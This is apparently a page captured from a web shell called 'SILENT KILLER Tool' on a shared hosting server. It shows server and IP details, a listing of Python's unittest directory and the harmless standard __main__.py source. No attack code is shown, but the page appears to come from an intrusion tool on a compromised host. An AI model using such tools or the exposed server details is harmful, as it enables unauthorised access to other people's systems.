Current Path: > > usr > lib64 > python3.6 > unittest
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
__pycache__ | Directory | - | - | |
__init__.py | File | 3179 bytes | August 26 2025 08:58:55. | |
__main__.py | File | 485 bytes | December 23 2018 21:37:14. | |
case.py | File | 57500 bytes | August 26 2025 08:58:55. | |
loader.py | File | 22224 bytes | December 23 2018 21:37:14. | |
main.py | File | 10552 bytes | December 23 2018 21:37:14. | |
mock.py | File | 79856 bytes | December 23 2018 21:37:14. | |
result.py | File | 7442 bytes | December 23 2018 21:37:14. | |
runner.py | File | 7751 bytes | December 23 2018 21:37:14. | |
signals.py | File | 2403 bytes | December 23 2018 21:37:14. | |
suite.py | File | 10479 bytes | December 23 2018 21:37:14. | |
util.py | File | 5433 bytes | December 23 2018 21:37:14. |
"""Main entry point""" import sys if sys.argv[0].endswith("__main__.py"): import os.path # We change sys.argv[0] to make help message more useful # use executable without path, unquoted # (it's just a hint anyway) # (if you have spaces in your executable you get what you deserve!) executable = os.path.basename(sys.executable) sys.argv[0] = executable + " -m unittest" del os __unittest = True from .main import main, TestProgram main(module=None)
SILENT KILLER Tool